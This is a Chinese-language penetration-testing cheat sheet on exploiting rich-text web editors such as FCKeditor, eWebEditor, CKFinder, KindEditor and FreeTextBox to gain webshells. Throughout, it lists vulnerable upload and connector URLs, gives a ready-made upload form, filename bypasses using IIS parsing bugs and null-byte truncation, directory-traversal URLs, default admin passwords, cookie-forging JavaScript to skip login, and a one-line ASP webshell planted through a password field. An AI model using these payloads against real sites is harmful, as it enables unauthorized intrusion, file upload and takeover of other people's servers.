• 常见的文本编辑器有CKEditor、.Ewebeditor、UEditor、KindEditor、XHeditor等。这类编辑器的功能是非常类似的,比如都有图片上传、视频上传、远程下载等功能,这类文本编辑器也称为富文本编辑器
  • 使用此类编辑器减少了程序开发的时间,但是却增加了许多安全隐患,比如:使用CKEditor编辑器有10万个树站,如果CKEditor爆出一个GetShell漏洞,那么这10万个网站都因此受到牵连。
    下面以FCKeditor编辑器为例,讲述文本编辑器漏洞。

    FCK编辑器漏洞

    FCKeditor是一个开放源代码、所见即所得的文字编辑器,可以适用于ASP/PHP/ASPX/JSP等脚本类型网站.
  • 注:FCKeditor现已改名为CKEditor。

    FCKeditor编辑器页/查看编辑器版本/查看文件上传路径

    FCKeditor编辑器页

    1
    FCKeditor/_samples/default.html 

    查看编辑器版本

    1
    FCKeditor/_whatsnew.html 

    查看文件上传路径

    1
    fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ 

    查找可利用的上传页面

查找方法:

  1. 手工收集上传地址,访问测试看是否能上传
  2. 利用编辑器对应利用工具查找上传页面
  3. 利用目录扫描工具进行探测查找

    常见上传页面地址

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    FCKeditor/editor/filemanager/browser/default/connectors/test.html
    FCKeditor/editor/filemanager/upload/test.html
    FCKeditor/editor/filemanager/connectors/test.html
    FCKeditor/editor/filemanager/connectors/uploadtest.html
    FCKeditor/_samples/default.html
    FCKeditor/_samples/default.html
    FCKeditor/_samples/asp/sample01.asp
    FCKeditor/_samples/asp/sample02.asp
    FCKeditor/_samples/asp/sample03.asp
    FCKeditor/_samples/asp/sample04.asp
    fckeditor/editor/filemanager/connectors/test.html

    asp常用上传页面地址

    1
    fckeditor//editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    1
    fckeditor//editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
    1
    fckeditor//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

    aspx常用上传地址

    1
    fckeditor//editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    1
    fckeditor//editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx
    1
    fckeditor//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/aspx/connector.aspx

php常用上传地址

1
fckeditor//editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
1
fckeditor//editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/php/connector.php
1
fckeditor//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/php/connector.php
1
fckeditor//editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
1
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)

漏洞利用

  • Fckeditor 2.0 <= 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件

 

  • FCKeditor v2.4.3中File类别默认拒绝上传类型:
    1
    2
    html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc| 
      pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm 

  • windows有任意文件上传漏洞如x.asp;.jpg
    Apache+linux 环境下在上传文件后面加个.突破!测试通过。

    Version <=2.4.2 For php

    在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
    1
    2
    3
    4
    5
    <form id="frmUpload" enctype="multipart/form-data"
    action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
    <input type="file" name="NewFile" size="50"><br>
    <input id="btnUpload" type="submit" value="Upload">
    </form>

    低于fck 2.5版本利用

看网站容器是否是IIS 6.0 ,利用解析漏洞
可以上传下 x.asa/cer/cdx 或者 x.jpg;.cer/x.jpg;asa
利用目录解析漏洞
创建一个x.asp 目录 上传图片马即可

利用00截断漏洞
x.asp%00jpg

FCKeditor 文件上传“.”变“_”下划线的绕过方法

  • fckeditor 2.5 文件上传“.”变“_”下划线的绕过方法
  • 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
  • 突破方法:
  1. 二次上传
  2. a.asp%00.jpg 00截断利用
  3. 使用特殊名称绕过
    a.aspx.a;.a.aspx.jpg..jpg.aspx
    xx.asp.;.jpg
  4. 递归创建a.asp目录配合解析漏洞
  5. FCKeditor_2.5/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp

fckeditor 2.6.3 php版本利用

上传页面地址

1
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php

转包在url中00截断

FCK编辑器jsp版本漏洞:

1
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F

上传马所在目录

1
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

上传shell的地址:

1
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector

EWEB编辑器漏洞

eweb编辑器利用流程

  1. 查找eweb编辑器路径,找eweb管理后台
  2. 进入后台,修改上传文件类型
  3. 上传脚本拿shell
  4. 如果没有后台
    1. 看是否能下载数据库,看数据库中有没有可以上传脚本的样式,构造上传
    2. 利用eweb目录遍历漏洞,找到网站数据库,下载破解管理员密码进后台拿shell
    3. 查找对用编辑器版本漏洞利用拿shell

eWebEditor利用基础知识

  • 默认后台地址:/ewebeditor/admin_login.asp 
      建议最好检测下admin_style.asp文件是否可以直接访问 
      默认数据库路径:[PATH]/db/ewebeditor.mdb 
      [PATH]/db/db.mdb – 某些CMS里是这个数据库 
      也可尝试 [PATH]/db/%23ewebeditor.mdb – 某些管理员自作聪明的小伎俩
  • 使用默认密码:admin/admin888 或 admin/admin 进入后台,也可尝试 admin/123456 (有些管理员以及一些CMS,就是这么设置的) 

    有修改权限的利用

  • 通过增加样式–设置-添加插入图片-getshell
  • 不能添加工具栏,但设定好了某样式中的文件类型
  • 修改action字段
  • 比如 ID=46 s-name =standard1 
    • 构造 代码: ewebeditor.asp?id=content&style=standard 
    • ID和和样式名改过后 
    • ewebeditor.asp?id=46&style=standard1 
    • eWebEditor遍历目录漏洞

      无修改权限

通过目录遍历:
http://www.webshell.com/admin/editor/admin_uploadfile.asp?id=&dir=..
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.****.com/../.. 看到整个网站文件了

eWebEditor 5.2 列目录漏洞

 ewebeditor/asp/browse.asp 
  过滤不严,造成遍历目录漏洞 
http://www.xxxx.com/ewebeditor/asp/browse.asp?style=standard650&dir=…././/.. 
  利用WebEditor session欺骗漏洞,进入后台 

eWebEditor 2.7.0 注入漏洞

http://www.xxxx.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200 

默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用nbsi进行猜解. 

eWebEditor2.8.0最终版删除任意文件漏洞

此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入。 
攻击利用: (请修改action字段为指定网址) 
Del Files.html 

eWebEditor PHP/ASP…后台通杀漏洞

影响版本: PHP ≥ 3.0~3.8与asp 2.8版也通用,或许低版本也可以,有待测试。 

  攻击利用: 

进入后台/eWebEditor/admin/login.php,随便输入一个用户和密码,会提示出错了. 
  这时候你清空浏览器的url,然后输入 
  javascript:alert(document.cookie=”adminuser=”+escape(“admin”)); 
  javascript:alert(document.cookie=”adminpass=”+escape(“admin”)); 
  javascript:alert(document.cookie=”admindj=”+escape(“1”)); 
  而后三次回车,清空浏览器的URL,现在输入一些平常访问不到的文件如../ewebeditor/admin/default.php,就会直接进去。 

eWebEditor 2.8 商业版插一句话木马

登陆后台,点击修改密码—新密码设置为 1”:eval request(“h”)’ 
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了. 

eWebEditor

下载数据库
查看可以上传脚本类型的样式
然后进行构造上传

其他编辑器漏洞

CKFinder 任意文件上传漏洞

CKFinder是国外一款非常流行的所见即所得文字编辑器,其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件。CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传xxxx_php;1.jpg 等畸形文件名,最终导致文件上传漏洞。

  • 然后修改文件名
  • xxxx.php;1.jpg
  • 利用iis6.0目录解析漏洞拿shell
  • 创建目录/x.asp/
  • 在目录下上传图片马即可拿shell

    南方数据编辑器southidceditor

  • 首先登陆后台
  • 利用编辑器上传:
  • 访问admin/southidceditor/admin_style.asp
  • 修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.

通过upfile_other.asp漏洞文件直接取SHELL
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用双文件上传
此方法通杀南方数据、良精系统、网软天下等

在Upfile_Photo.asp文件中
只限制了对”asp”,”asa”,”aspx”类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可

UEDITOR

利用II6.0文件名解析漏洞,上传图片改名为x.php;20160032342342.jpg获取shell

DotNetTextBox编辑器漏洞

  • 关键字:system_dntb/
  • 确定有 system_dntb/uploadimg.aspx 并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具。
  • cookie:UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/Upload/;
  • 路径可以修改,只是权限够,上传后改名为1.asp;.jpg利用iis解析漏洞。

system_dntb/advanced.aspx
用firebug将disabled=”disabled’,value=”jgp,gif,png”修改为enabled=”enabled”,value=”jpg,gif,png,aspx”,然后点更新成功按钮

PHPWEB网站管理系统后台Kedit编辑器

两种利用方式

 

Cute Editor Asp.Net版利用iis解析漏洞获得权限

影响版本:
CuteEditor for ASP.NET中文版脆弱描述:
脆弱描述:
CuteEditor对上传文件名未重命名,导致其可利用IIS文件名解析Bug获得webshell权限。
攻击利用:
可通过在搜索引擎中键入关键字 inurl:Post.aspx?SmallClassID= 来找到测试目标。
在编辑器中点击“多媒体插入”,上传一个名为“xxx.asp;.avi”的网马,以此获得权限。

Webhtmleditor

利用WIN 2003 IIS文件名称解析漏洞获得SHELL 
对上传的图片或其他文件无重命名操作,导致允许恶意用户上传diy.asp;.jpg来绕过对后缀名审查的限制,对于此类因编辑器作者意识犯下的错误,就算遭遇缩略图,文件头检测,也可使用图片木马 插入一句话来突破。 

Kindeditor

利用WIN 2003 IIS文件名称解析漏洞获得SHELL 
  影响版本: <= kindeditor 3.2.1(09年8月份发布的最新版) 
  脆弱描述/攻击利用: 
  upload/2010/3/201003102334381513.jpg 大家可以前去围观。
xx.asp;x.jpg

##Freetextbox
Freetextbox遍历目录漏洞 
  影响版本:未知 
  脆弱描述: 
  因为ftb.imagegallery.aspx代码中 只过滤了/但是没有过滤\符号所以导致出现了遍历目录的问题。 
  攻击利用: 
  在编辑器页面点图片会弹出一个框(抓包得到此地址)构造如下,可遍历目录。 
  http://www.xxxx.com/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=\.. 

Freetextbox Asp.Net版利用IIS解析漏洞获得权限

影响版本:所有版本
脆弱描述:
没做登陆验证可以直接访问上传木马
Freetextbox 3-3-1 可以直接上传任意格式的文件
Freetextbox 1.6.3 及其他版本可以上传 格式为x.asp;.jpg
攻击利用:
利用IIS解析漏洞拿SHELL。上传后SHELL的路径为http://xxxx.com/images/x.asp;.jpg

Msn editor利用iis6.0解析漏洞

影响版本:未知
脆弱描述:
点击图片上传后会出现上传页面,地址为
http://navisec.it/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=
用普通的图片上传后,地址为
http://navisec.it/news/uppic/41513102009204012_1.gif
记住这时候的路径,再点击图片的上传,这时候地址就变成了
http://navisec.it/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012
很明显。图片的地址是根据RemNum后面的编号生成的。
攻击利用:
配合IIS的解析漏洞,把RemNum后面的数据修改为1.asp;41513102009204012,变成下面这个地址
http://navisec.it/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012
然后在浏览器里打开,然后选择你的脚本木马上传,将会返回下面的地址
uppic/1.asp;41513102009204012_2.gif
直接打开就是我们的小马地址!
附录